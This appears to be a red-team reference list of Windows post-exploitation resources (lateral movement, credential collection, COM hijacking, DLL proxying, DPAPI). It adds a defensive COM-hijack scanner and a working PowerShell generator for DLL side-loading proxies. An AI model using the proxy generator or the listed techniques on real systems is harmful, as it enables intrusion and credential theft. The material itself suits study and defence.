Articles/Blogposts/Writeups
- Windows Driver and Service enumeration with Python - slacker007(2015)
- Finding Hidden Treasure on Owned Boxes: Post-Exploitation Enumeration with wmiServSessEnum - RedXORBlue(2019)
  - TLDR: We can use WMI queries to enumerate accounts configured to run any service on a box (even non-started / disabled), as well as perform live session enumeration. Info on running the tool is in the bottom section.
- Detecting Hypervisor Presence On Windows 10 - Daax Rynd
- Windows information gathering using Powershell: a brief cheatsheet - Andrea Fortuna(2019)
- Get Process List with Command Line Arguments - mubix(2020)
- What was my IP? Ask DoSvc on Windows 10 - Forense nella Nebbia(2018)
Tools
User Awareness
- Enumerating Users without net, Services without sc and Scheduled Tasks without schtasks - @spotheplanet
- T1010: Application Window Discovery - @spotheplanet
- T1087: Account Discovery & Enumeration - @spotheplanet
General Tools
- PyStat
  - Advanced Netstat For Windows
- pspy
  - pspy is a command line tool designed to snoop on processes without the need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate to your colleagues why passing secrets as arguments on the command line is a bad idea. The tool gathers its info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
- forgetmenot
  - local looting script in python
- SharpPrinter
  - SharpPrinter is a modified, console version of ListNetworks. As an example, one could execute SharpPrinter.exe through Cobalt Strike's Beacon "execute-assembly" module.
- wmiServSessEnum
  - multithreaded .net tool that uses WMI queries to enumerate active user sessions and accounts configured to run services (even those that are stopped and disabled) on remote systems
- MemScan
  - Quick Proof of Concept for reading a process's memory and searching for a specific string.
- RidRelay
  - Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv.
- Eavesarp
  - A reconnaissance tool that analyzes ARP requests to identify hosts that are likely communicating with one another, which is useful in those dreaded situations where LLMNR/NBNS aren't in use for name resolution.
  - Blogpost
- hunter
  - (l)user hunter using WinAPI calls only
- NetRipper
  - NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.
- NCC Group Scrying
  - A tool for collecting RDP, web and VNC screenshots all in one place
Lateral Movement
Articles/Blogposts/Writeups
- Using Credentials to Own Windows Boxes - Part 1 (from Kali) - ropnop
- Authenticated Remote Code Execution Methods in Windows
- Lateral Movement and Persistence: tactics vs techniques - hexacorn(2018)
- Offensive Lateral Movement - Hausec
- Lateral Movement - Riccardo Carrani(2019)
- Description of User Account Control and remote restrictions in Windows Vista - support.ms
- LAteral Movement Encryption technique (a.k.a. The "LAME" technique) - dotelite.gr(2018)
Talks/Presentations/Videos
- The Industrial Revolution of Lateral Movement - Tal Be'ery, Tal Maor(BH USA17)
- Look what you could be up against soon - FX, Hadez(Offensivecon2020)
  - Lateral movement is essential for offensive operations during CNO. Exploiting the inherent trust relationships is what makes spreading within the chewy inside of a network so easy once the crunchy outside is broken. But what if the chewy inside is bitchy and challenges you everywhere you want to go? That's what P3KI is all about: To make the chewy inside more bitchy. Hear about how we intend to make your life harder and why the often dismissed "social engineering" aspect might become essential in cases where you face a network employing P3KI's technology deployed.
AppInit.dlls
DCOM
- Lateral movement using excel application and dcom(2017)
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript - Matt Nelson(2017)
- New lateral movement techniques abuse DCOM technology - Philip Tsukerman(2018)
- Lateral Movement with PowerPoint and DCOM - Attactics(2018)
- T1175: Lateral Movement via DCOM - @spotheplanet
- I Like to Move It: Windows Lateral Movement Part 2 – DCOM - Dominic Chell(2020)
Desired State Configuration
DLL Hijacking
Excel
- Excel4.0 Macros - Now With Twice The Bits! - Philip Tsukerman
- Excel4-DCOM
  - PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
- Invoke-ExShellcode.ps1 - Philts
  - Lateral movement and shellcode injection via Excel 4.0 macros
NTLM Relay
Pass-The-Hash
101
Articles/Blogposts/Writeups
- Puff Puff PSExec - Jonathan Renard
- PsExec and the Nasty Things It Can Do
  - An overview of what PsExec is and what its capabilities are from an administrative standpoint.
- Pass-the-Hash is Dead: Long Live Pass-the-Hash - harmj0y
- Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - harmj0y
- Still Passing the Hash 15 Years Later: Using Keys to the Kingdom to Access Data - BH 2012
- Still Passing the Hash 15 Years Later
- The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1
- Pass-the-Hash in Windows 10 - Lukasz Cyra(2019)
  - Attackers have used the Pass-the-Hash (PtH) attack for over two decades. Its effectiveness has led to several changes to the design of Windows. Those changes influenced the feasibility of the attack and the effectiveness of the tools used to execute it. At the same time, novel PtH attack strategies appeared. All this has led to confusion about what is still feasible and what configurations of Windows are vulnerable. This paper examines various methods of hash extraction and execution of the PtH attack. It identifies the prerequisites for the attack and suggests hardening options. Testing in Windows 10 v1903 supports the findings. Ultimately, this paper shows the level of risk posed by PtH to environments using the latest version of Windows 10.
- Et tu Kerberos - Christopher Campbell
  - For over a decade we have been told that Kerberos is the answer to Microsoft’s authentication woes and now we know that isn’t the case. The problems with LM and NTLM are widely known, but the problems with Kerberos have only recently surfaced. In this talk we will look back at previous failures in order to look forward. We will take a look at what recent problems in Kerberos mean to your enterprise and ways you could possibly mitigate them. Attacks such as Spoofed-PAC, Pass-the-Hash, Golden Ticket, Pass-the-Ticket and Over-Pass-the-Ticket will be explained. Unfortunately, we don’t really know what is next – only that what we have now is broken.
- Battle Of SKM And IUM How Windows 10 Rewrites OS Architecture - Alex Ionescu - BHUSA2015
- Psexec: The Ultimate Guide - Adam Bertram
- Pass the Hash with Kerberos - mubix
  - This blog post may be of limited use; most of the time, when you have an NTLM hash, you also have the tools to use it. But, if you find yourself in a situation where you don’t have the tools and do happen to have kerberos tools, you can pass the hash with it.
- Pass-The-Hash with RDP in 2019 - Acebond
Tools
- smbexec
  - A rapid psexec style attack with samba tools
  - Blogpost that inspired it
- pth-toolkit, i.e. Portable pass the hash toolkit
  - A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems
PS-Remoting
101
Articles/Blogposts/Writeups
Protocol Handler
Articles/Blogposts/Writeups
Tools
- PoisonHandler
  - This technique registers a protocol handler remotely and invokes it to execute arbitrary code on the remote host. The idea is to simply invoke start handler:// to execute commands and evade detection.
Port-Forwarding & Proxies
- Port Forwarding in Windows - WindowsOSHub
- WinPortPush
  - WinPortPush is a small PowerShell utility used for pivoting into internal networks upon compromising a Windows public-facing host.
RDP
- Remote Desktop Services Shadowing – Beyond the Shadowed Session - Roman Maximov(2020)
- RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation - Kevin Beaumont (https://doublepulsar.com/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6)
- RDPInception - MDsec
- The RDP Through SSH Encyclopedia - Carrie Roberts
  - I have needed to remind myself how to set up RDP access through an SSH connection so many times that I’ve decided to document it here for future reference. I hope it proves useful to you as well. I do “adversary simulation” for work and so I present this information using terms like “attacker” and “target” but this info is also useful for performing system administration tasks.
- Remote Desktop tunneling tips & tricks - Maurizio Agazzini
- Jumping Network Segregation with RDP - Rastamouse
- Revisiting Remote Desktop Lateral Movement - 0xthirteen(2020)
  - Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
Registry-related
Articles/Blogposts/Writeups
Tools
- WMIReg
  - This PoC was started from a code snippet of @harmj0y's that I thought was pretty cool. Using the StdRegProv management class through WMI, you are able to read and write to local and remote registry keys. This doesn't seem very special, but the biggest advantage is that remote registry interaction is done through WMI, therefore it does not require the Remote Registry service to be enabled/started on the remote host!
SCM
Articles/Blogposts/Writeups
Tools
Services
Articles/Blogposts/Writeups
Tools
- MoveScheduler
  - "MoveScheduler is another weekend binge that focuses on lateral movement via several different methods of scheduling tasks"
- SharpMove
- SCShell
  - SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.
SMB
Articles/Blogposts/Writeups
Tools
- CrackMapExec
  - A swiss army knife for pentesting networks
SSH
WinRM
- 101
-
Articles/Blogposts/Writeups
- Windows Remote Management - dmcxblue
- WS-Management COM: Another Approach for WinRM Lateral Movement - bohops(2020)
- WinRM Penetration Testing - Yashika Dhir(2020)
- Lateral Movement Using WinRM and WMI - Tony Lambert(2017)
- Lateral Movement – WinRM - pentestlab.blog(2018)
- T1028: WinRM for Lateral Movement - @spottheplanet
-
Tools
-
Evil-WinRM
- The ultimate WinRM shell for hacking/pentesting
- WS-Management COM: Another Approach for WinRM Lateral Movement - BOHOPS(2020)
-
WSMan-WinRM
- A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object
-
rudder
- rudder is a Python package to run commands remotely on Windows, macOS or nix systems using PowerShell Remoting/WinRM or SSH.
-
Evil-WinRM
-
- WMI
  - 101
  - Articles/Blogposts/Writeups
    - T1047: WMI for Lateral Movement - @spotheplanet
    - Lateral Movement: WMI - Pavandeep Singh(2020)
    - No Win32_Process Needed – Expanding the WMI Lateral Movement Arsenal - Philip Tsukerman
    - Lateral Movement in an Environment with Attack Surface Reduction - Michael Bielenberg(2019)
    - I Like to Move It: Windows Lateral Movement Part 1 – WMI Event Subscription - Dominic Chell(2020)
  - Papers
  - Tools
    - WMI Shell Tool
      - The WMI shell tool that we have developed allows us to execute commands and get their output using only the WMI infrastructure, without any help from other services, like the SMB server. With the wmi-shell tool we can execute commands, upload files and recover Windows passwords remotely using only the WMI service available on port 135.
    - WMIcmd
      - A command shell wrapper using only WMI for Microsoft Windows
- WSH
- (Ab)Using 'Legitimate' Applications already installed
  - Articles/Blogposts/Writeups
    - How I Hacked Into Your Corporate Network Using Your Own Antivirus Agent - Angelo Ruwantha
      - Code execution through admin access to the ESET administration console
    - Abusing Common Cluster Configuration for Lateral Movement
      - Tech sites have published articles that walk a Windows Systems Administrator through the process of adding a machine account to the Local Administrators group on another machine. These accounts end in a $ (dollar sign) and look like SERVER$ in Active Directory. While this may be useful for simplifying the installation of clusters such as Lync, Exchange, or SQL Server, it's not always the best idea. Servers that are set up in this way weaken the overall security posture of the cluster, and ultimately the organization, by allowing a single vulnerability or misconfiguration on one server the ability to move laterally without having to escalate privileges or compromise additional credentials. Using SQL Server as the example, any user who has READ permissions to a database essentially has SYSTEM-level permissions on a remote server. We'll walk through that path below.
    - Abusing Firefox in Enterprise Environments - MDSec
  - Tools
    - PoisonHandler
      - This technique registers a protocol handler remotely and invokes it to execute arbitrary code on the remote host. The idea is simply to invoke `start handler://` to run commands and evade detection.
- Collection
  - 101
  - Articles/Blogposts/Writeups
    - Digging Up the Past: Windows Registry Forensics Revisited - David Via
    - Pillage Exchange - Digby
    - Pillaging .pst Files - Digby
    - File Server Triage on Red Team Engagements - harmj0y
    - No one expect command execution!
    - Decrypting IIS Passwords to Break Out of the DMZ
    - Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host - zc00l(2018)
  - CC
    - SearchForCC
      - A collection of open source/common tools/scripts to perform a system memory dump and/or process memory dump on Windows-based PoS systems and search for unencrypted credit card track data.
  - Code Storage
    - dvcs-ripper
      - Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
    - cred_scanner
      - A simple command line tool for finding AWS credentials in files. Optimized for use with Jenkins and other CI systems.
  - KeePass
  - Outlook
  - PCAP/Live Interface
    - net-creds
      - Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
    - PCredz
      - This tool extracts credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc.), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc. from a pcap file or from a live interface.
  - Skype
    - skype log viewer
      - Download and View Skype History Without Skype. This program allows you to view all of your Skype chat logs and then easily export them as text files. It correctly organizes them by conversation, and makes sure that group conversations do not get jumbled with one-on-one chats.
- Exfiltration
  - Articles/Blogposts/Writeups
Windows Technologies
- Alternate Data Streams
  - 101 *
- AppLocker
  - 101
    - AppLocker - docs.ms
      - This topic provides a description of AppLocker and can help you decide if your organization can benefit from deploying AppLocker application control policies. AppLocker helps you control which apps and files users can run. These include executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers.
    - What Is AppLocker? - docs.ms
    - AppLocker design guide - docs.ms
    - AppLocker deployment guide - docs.ms
    - AppLocker technical reference - docs.ms
    - How AppLocker works - docs.ms
    - Security considerations for AppLocker - docs.ms
  - Articles/Blogposts/Writeups
    - Getting Started With AppLocker - John Strand(2019)
    - Script Rules in AppLocker - technet
    - DLL Rules in AppLocker
    - Application Whitelisting Using Microsoft AppLocker
    - Harden Windows with AppLocker – based on Case study Part 1 - oddvar.moe
    - Harden Windows with AppLocker – based on Case study part 2 - oddvar.moe
    - AppLocker Case study: How insecure is it really? Part 1 - oddvar.moe
    - [AppLocker Case study: How insecure is it really? Part 2 - oddvar.moe](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)
  - Talks/Presentations/Videos
- Application Shims
- ClickOnce Applications
  - ClickOnce - Wikipedia
  - ClickOnce security and deployment - docs.ms
  - ClickOnce Deployment for Windows Forms - docs.ms
  - ClickOnce Applications in Enterprise Environments - Remko Weijnen
    - ClickOnce is a Microsoft technology that enables an end user to install an application from the web without administrative permissions.
  - Eight Evil Things Microsoft Never Showed You in the ClickOnce Demos (and What You Can Do About Some of Them) - Chris Williams
- Credential Guard
  - 101 *
- Code Signing
  - Articles/Blogposts/Writeups
    - Windows File Confusion: Masquerading Unsigned Binaries as Signed Ones - Matt Graeber(2013)
    - Inside Code Signing - Thomas 'toto' Kollbach(2014)
    - Code Signing Certificate Cloning Attacks and Defenses - Matt Graeber
    - MetaTwin – Borrowing Microsoft Metadata and Digital Signatures to “Hide” Binaries - Joe Vest
    - Borrowing Microsoft Code Signing Certificates - lopi
    - Application of Authenticode Signatures to Unsigned Code - mattifestation
    - Subverting Trust in Windows - Matt Graeber
    - Masquerading as a Windows System Binary Using Digital Signatures - Stuart Morgan
    - Hijack Digital Signatures – PowerShell Script - pentestlab.blog
    - Code Signing Certificates - Barry Vengerik(FireEye Summit 2019)
    - Code Signing on a Budget - @Jackson_T(2020)
      - "Summary: This post goes over how attackers could use search engines to find and abuse legitimate code-signing certificates. With this technique, I was able to find a valid code-signing certificate belonging to a leading tech company and disclosed it to them. This isn't particularly novel but I'm writing this to raise defensive awareness that abusing code-signing certificates is not limited to well-resourced attackers."
    - Signing .jar files with an existing certificate on Windows - Chad Duffey(2020)
  - Talks/Videos
  - Tools
    - CarbonCopy
      - A tool which creates a spoofed certificate of any online website and signs an executable for AV evasion. Works for both Windows and Linux.
    - certerator
      - This is the code relating to a project to simplify the act of creating a CA, signing a binary with the CA and then installing the CA on the target machine. It investigates the extent to which this can be achieved without the benefit of a GUI and shows how this can be modified to generate valid EV certificates which are trusted by Windows. It is intended for penetration testers who are looking to install an implant binary which looks as legitimate as possible. None of these techniques are new, but it is hoped that this tool and project will make them easier and more accessible.
- (Distributed) Component-Object-Model(COM)
  - 101
    - Component Object Model - Wikipedia
    - Distributed Component Object Model - Wikipedia
    - The Component Object Model - docs.ms
      - COM is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents) and ActiveX (Internet-enabled components) technologies.
    - [MS-DCOM]: Distributed Component Object Model (DCOM) Remote Protocol - docs.ms
      - Specifies the Distributed Component Object Model (DCOM) Remote Protocol, which exposes application objects via remote procedure calls (RPCs) and consists of a set of extensions layered on the Microsoft Remote Procedure Call Extensions.
    - [MS-RPCE]: Remote Procedure Call Protocol Extensions - msdn.ms
    - Guide (to COM) - docs.ms
      - This guide introduces the Microsoft Component Object Model (COM).
    - COM Fundamentals - docs.ms
    - COM Objects and Interfaces - docs.ms
      - COM is a technology that allows objects to interact across process and computer boundaries as easily as within a single process. COM enables this by specifying that the only way to manipulate the data associated with an object is through an interface on the object. When this term is used in this documentation, it refers to an implementation in code of a COM binary-compliant interface that is associated with an object.
    - COM Reference - docs.ms
    - COM Glossary
  - Articles/Blogposts/Writeups
    - Component Object Model Technical Overview - The ActiveX Core Technology Reference(1999)
    - Mike Panitz's Introduction to COM
    - The Component Object Model: Technical Overview(1994)
      - This paper is adapted from an article appearing in Dr. Dobb's Journal, December 1994.
    - Exploiting .NET Managed DCOM - James Forshaw(2017)
      - One of the more interesting classes of security vulnerabilities are those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also in many cases they're difficult for a developer to mitigate outside of not using that technology, something which isn't always possible. I discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET which make the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability.
    - COM Hijacking – Windows Overlooked Security Vulnerability - Yaniv Assor
    - Abusing COM objects - 0xpat
    - Hunting COM Objects - Charles Hamilton(2019)
    - COM and the PowerThIEf - Rob Maslen
    - The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication - Airbus(2020)
  - Talks/Presentations/Videos
  - Papers
    - The Dangers of Per-User COM Objects - Jon Larimer(2011)
    - Automating the enumeration of possible DCOM vulnerabilities - Axel Boesenach(2018)
      - This paper describes the research into DCOM applications that might be used for lateral movement on Microsoft Windows domains. 'Living off the land' techniques are used more and more by attackers, but also pentesters and red teams. The research builds on the previous methods and their correlations to develop an automated manner to enumerate these DCOM applications that might provide lateral movement.
- COM Hijacking
  - Articles/Blogposts/Writeups
  - Tools
    - Helpful
      - COMMethodSearcher
        - Script that searches through all COM objects for any methods containing a key word of your choosing.
    - Discovery
      - OxidBindings
        - Extract all IPs of a computer using DCOM without authentication (aka detect the network used for administration)
    - Hijacking
      - MessageBox
        - PoC DLLs for Task Scheduler COM hijacking
      - PS1jacker
        - PS1jacker is a tool for generating COM hijacking payloads.
      - COMProxy
        - A COM client and server for testing COM hijack proxying. If you are running a COM hijack, proxying the legitimate COM server may result in better stability; that's the idea behind this PoC.
    - Lateral Movement
      - DVS
        - D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM objects
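An added example from the defender's side of the hijacking tools above (my code, not from any of the listed projects or the "Hunting COM Objects" post): because `HKCU\Software\Classes` is consulted before `HKLM\Software\Classes` when a CLSID is resolved, a per-user server entry that shadows a machine-wide one, points at a DLL that does not exist, or points at a DLL the user can overwrite is either a hijack or a hijack waiting for a payload. The scan is read-only.

```powershell
# Added example: enumerate per-user COM registrations and flag hijack candidates.
# Elevated (high-integrity) processes ignore per-user classes, so these entries only
# affect medium-integrity processes of this user; that is still every browser, Office
# app and explorer.exe instance.
function Test-UserWritable([string]$File) {
    # Crude check: can the current user open the file for writing? A DLL that is
    # currently loaded fails on sharing, so treat the result as a lower bound.
    try { $fs = [IO.File]::Open($File, 'Open', 'Write', 'ReadWrite'); $fs.Dispose(); $true } catch { $false }
}

function Get-ComHijackCandidates {
    foreach ($k in Get-ChildItem 'HKCU:\SOFTWARE\Classes\CLSID' -ErrorAction SilentlyContinue) {
        $clsid = $k.PSChildName
        foreach ($sub in 'InprocServer32', 'LocalServer32') {
            $srv = Get-ItemProperty -Path (Join-Path $k.PSPath $sub) -ErrorAction SilentlyContinue
            if (-not $srv) { continue }
            $path = [string]$srv.'(default)'
            # Strip surrounding quotes and trailing arguments, expand %SystemRoot%-style variables.
            $file = [Environment]::ExpandEnvironmentVariables(
                        (($path -replace '^"([^"]+)".*$', '$1') -replace '\s+[/-].*$', ''))
            $exists = [bool]$file -and (Test-Path -LiteralPath $file)
            [pscustomobject]@{
                CLSID        = $clsid
                Server       = $sub
                Path         = $path
                ShadowsHKLM  = Test-Path "HKLM:\SOFTWARE\Classes\CLSID\$clsid\$sub"
                FileMissing  = -not $exists
                UserWritable = $exists -and (Test-UserWritable $file)
            }
        }
    }
}

Get-ComHijackCandidates |
    Where-Object { $_.ShadowsHKLM -or $_.FileMissing -or $_.UserWritable } |
    Sort-Object ShadowsHKLM, FileMissing -Descending |
    Format-Table CLSID, Server, ShadowsHKLM, FileMissing, UserWritable, Path -AutoSize
```

Legitimate per-user registrations (per-user installs of Teams, OneDrive, Chrome and similar) will appear with `ShadowsHKLM = False` and an existing, user-writable file; the rows worth a closer look are the ones that shadow a machine-wide CLSID, and missing-file entries for CLSIDs that a scheduled task or a shell extension is known to load.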
- Execution
  - Building a COM Server for Initial Execution - leoloobeek(2020)
    - This post will expand on previous research and cover writing your own COM server DLL, loading it from scripting languages with registration-free activation, and discussion around weaponization and OPSEC. This was a personal journey that helped me learn a lot more about what happens when you create and use a COM object from JScript. I will also be releasing a PoC COM server that runs provided shellcode.
  - Tools
    - COMRunner
      - A simple COM server which provides a component to run shellcode. Also includes a Windows JScript file to load the COM server and create the object with registration-free activation. This PoC COM server provides an object with a method that takes in base64 encoded shellcode and a method to run the shellcode.
- Serialization/Marshalling
- Programming with
  - C#
  - C/C++
  - Python
  - VBA
- DLLs
  - 101
    - What is a DLL? - support.ms
    - Dynamic-Link-Library - Wikipedia
    - DLL Hell - Wikipedia
    - Dynamic-Link Library Redirection - docs.ms
      - Applications can depend on a specific version of a shared DLL and start to fail if another application is installed with a newer or older version of the same DLL. There are two ways to ensure that your application uses the correct DLL: DLL redirection and side-by-side components. Developers and administrators should use DLL redirection for existing applications, because it does not require any changes to the application. If you are creating a new application or updating an application and want to isolate your application from potential problems, create a side-by-side component.
  - Articles/Blogposts/Writeups
    - What is a `*.local` file in Windows? - abcdef(2020)
    - Debugging DLLs – 3 techniques to help you get started - Jean-François Maes(2020)
    - Using Pragmas to Create a Proxy DLL - Kontza(2007)
      - This article explains a way to create a proxy DLL employing the MSVC compiler `#pragma comment` feature.
    - Quickpost: DllDemo - Didier Stevens(2017)
    - How to turn a DLL into a standalone EXE - Hasherezade(2016)
    - Staying Hidden on the Endpoint: Evading Detection with Shellcode - Evan Pena, Casey Erikson
    - Abusing DLL Misconfigurations — Using Threat Intelligence to Weaponize R&D - Evan Pena, Ruben Boonen, Brett Hawkins
    - edgegdi.dll for persistence - Chad Duffey(2020)
    - Abusing Delay Load DLLs for Remote Code Injection - Bryan Alexander(2017)
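As an added example tying the proxy-DLL and side-loading items above together (my code, not Kontza's or any listed tool's), the following walks the export directory of the DLL to be proxied and emits the `#pragma comment(linker, "/export:...")` lines a proxy DLL needs so that every import keeps resolving while `DllMain` runs the attacker's code. `version.dll` and the `_orig` rename suffix are assumptions for the demo; the original DLL is renamed to match and placed beside the proxy.

```powershell
# Added example: generate proxy-DLL linker pragmas from a PE export table.
# Written for x64 targets; 32-bit stdcall exports carry decorated names and need extra handling.
function Get-PeExports {
    param([Parameter(Mandatory)][string]$Path)
    $b   = [IO.File]::ReadAllBytes($Path)
    $u32 = { param($o) [BitConverter]::ToUInt32($b, $o) }
    $u16 = { param($o) [BitConverter]::ToUInt16($b, $o) }

    $pe = & $u32 0x3C                                        # e_lfanew -> "PE\0\0"
    if ((& $u32 $pe) -ne 0x4550) { throw "$Path is not a PE file" }
    $nSections = & $u16 ($pe + 6)
    $optSize   = & $u16 ($pe + 20)
    $opt       = $pe + 24                                    # IMAGE_OPTIONAL_HEADER
    $dirOffset = if ((& $u16 $opt) -eq 0x20B) { $opt + 112 } else { $opt + 96 }   # PE32+ vs PE32
    $exportRva = & $u32 $dirOffset                           # DataDirectory[0] = exports
    if ($exportRva -eq 0) { return @() }

    # Section table, used to translate RVAs into file offsets.
    $sections = for ($i = 0; $i -lt $nSections; $i++) {
        $s = $opt + $optSize + 40 * $i
        [pscustomobject]@{
            VA   = & $u32 ($s + 12)
            Size = [Math]::Max((& $u32 ($s + 8)), (& $u32 ($s + 16)))
            Raw  = & $u32 ($s + 20)
        }
    }
    $rva2off = {
        param($rva)
        $sec = $sections | Where-Object { $rva -ge $_.VA -and $rva -lt ($_.VA + $_.Size) } | Select-Object -First 1
        if (-not $sec) { throw ('RVA 0x{0:X} is not inside any section' -f $rva) }
        $rva - $sec.VA + $sec.Raw
    }
    $readStr = { param($off) $e = $off; while ($b[$e] -ne 0) { $e++ }; [Text.Encoding]::ASCII.GetString($b, $off, $e - $off) }

    $ed     = & $rva2off $exportRva                          # IMAGE_EXPORT_DIRECTORY
    $base   = & $u32 ($ed + 16)                              # ordinal base
    $nNames = & $u32 ($ed + 24)
    $names  = & $rva2off (& $u32 ($ed + 32))                 # AddressOfNames
    $ords   = & $rva2off (& $u32 ($ed + 36))                 # AddressOfNameOrdinals
    for ($i = 0; $i -lt $nNames; $i++) {
        $nameRva = & $u32 ($names + 4 * $i)
        $ordIdx  = & $u16 ($ords + 2 * $i)
        [pscustomobject]@{ Name = (& $readStr (& $rva2off $nameRva)); Ordinal = $base + $ordIdx }
    }
}

function New-ProxyPragmas {
    param(
        [Parameter(Mandatory)][string]$Dll,
        [string]$ForwardTo = ([IO.Path]::GetFileNameWithoutExtension($Dll) + '_orig')   # assumed rename of the original
    )
    Get-PeExports -Path $Dll | ForEach-Object {
        # Keeping the original ordinal makes the proxy work for importers that bind by ordinal.
        '#pragma comment(linker, "/export:{0}={1}.{0},@{2}")' -f $_.Name, $ForwardTo, $_.Ordinal
    }
}

# Demo: version.dll is a classic side-loading target; write the pragmas into a header
# that the proxy's source #includes.
$header = Join-Path $env:TEMP 'version_proxy.h'
New-ProxyPragmas -Dll "$env:SystemRoot\System32\version.dll" | Set-Content -Path $header
Get-Content $header | Select-Object -First 5
```

Only named exports are emitted; exports that exist by ordinal alone are not in the name table and have to be forwarded with `/export:,@<ordinal>,NONAME` by hand if the victim application uses them. Detection-wise, a proxy built this way is a DLL whose export table consists entirely of forwarders to a sibling module with an odd name, which is cheap to flag in a file scan.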
  - Talks/Presentations/Videos
    - Memory-Based Library Loading: Someone Did That Already. - Casey Rosini(Derbycon2017)
      - The technique of using memory-based library loading has been around for a number of years. It is available in different forms and for different operating systems. It has been popularized in the security-space with long-standing techniques perhaps even longer than some are aware. And here I thought that I found or did some new evasion. This talk discusses a library for Windows that is still maintained but has been seemingly overlooked for over a decade (or has it?), and how it can be used against the next-generation securing of the digitals.
  - Tools
    - CMDLL
      - The most basic DLL ever to pop a cmd.
    - DLL_to_EXE
      - Converts a DLL into a ready-to-use EXE.
    - DllToShellCode
      - Fast conversion of a Windows dynamic link library to shellcode
    - DLLoader
      - Surrogate DLL carrier for debugging purposes.
    - DLL loading shellcode
      - Shellcode to load an appended DLL
    - MaliciousDLLGenerator
      - DLL generator for side-loading attacks
  - DLL Hijacking
    - See DLL Stuff
  - DLL Hollowing
    - See DLL Hollowing
  - DLL Proxying
    - See DLL Proxying
- DPAPI
  - 101
    - CNG DPAPI - docs.ms
    - Data Protection API - Wikipedia
    - DPAPI Secrets. Security analysis and data recovery in DPAPI - Passcape
    - [Windows Data Protection - docs.ms (WinXP)](<https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)>)
    - module ~ dpapi - mimikatz
  - Articles/Blogposts/Writeups
    - DPAPI Primer for Pentesters - WebstersProdigy(2013)
    - Grab the Windows secrets! - decoder.cloud(2017)
    - DPAPI exploitation during pentest and password cracking - Jean-Christophe Delaunay
    - Happy DPAPI! - ZenaForensics
    - ReVaulting! Decryption and opportunities - Reality Net System Solutions
    - Windows ReVaulting - digital-forensics.it
    - TBAL: an (accidental?) DPAPI Backdoor for local users - vztekoverflow
    - Operational Guidance for Offensive User DPAPI Abuse - harmj0y
    - Offensive Encrypted Data Storage (DPAPI edition) - harmj0y
    - A Case Study in Attacking KeePass - harmj0y
    - Reading DPAPI Encrypted Secrets with Mimikatz and C++ - ired.team
    - Retrieving DPAPI Backup Keys from Active Directory - Michael Grafnetter
    - The Blackbox of DPAPI: the gift that keeps on giving - Bartosz Inglot(OPCDE2017)
  - Talks & Presentations
    - The BlackBox of DPAPI: The Gift That Keeps on Giving - Bart Inglot
    - DPAPI and DPAPI-NG: Decryption Toolkit - Paula Januszkiewicz
    - Protecting browsers' secrets in a domain environment - Itai Grady
      - All popular browsers allow users to store sensitive data such as credentials for online and cloud services (such as social networks, email providers, and banking) and form data (e.g. credit card number, address, phone number). In a Windows environment, most browsers (and many other applications) choose to protect these secrets by using the Windows Data Protection API (DPAPI), which provides an easy method to encrypt and decrypt secret data. Lately, Mimikatz, a popular pentest/hacking tool, was updated to include functionality that allows highly-privileged attackers to decrypt all DPAPI secrets. In this talk, I will analyze the Mimikatz Anti-DPAPI attack targeting the Domain Controller (DC), which puts all DPAPI secrets in peril, and show how it can be defeated with network monitoring.
    - Decrypting DPAPI data - Jean-Michel Picod, Elie Bursztein
    - give me the password and I'll rule the world: dpapi, what else? - Francesco Picasso
    - DPAPI exploitation during pentest and password cracking - Jean-Christophe Delaunay
    - ReVaulting! Decryption and opportunities - Francesco Picasso
      - Windows credentials manager stores users' credentials in special folders called vaults. Being able to access such credentials could be truly useful during a digital investigation, for example, to gain access to other protected systems. Moreover, if data is in the cloud, there is the need to have the proper tokens to access it. This presentation will describe vaults' internals and how they can be decrypted; the related Python open source code will be made publicly available. During the session, credentials and vaults coming from Windows 7, Windows 8.1 and Windows 10 will be decrypted, focusing on particular cases of interest. Finally, the presentation will address the challenges coming from Windows Phone, such as getting system users' passwords and obtaining users' ActiveSync tokens.
  - Tools
    - dpapick
      - DPAPIck is a forensic toolkit, written in Python and designed to easily deal with Microsoft DPAPI blob decryption in an offline and cross-platform way.
    - Windows DPAPI Lab
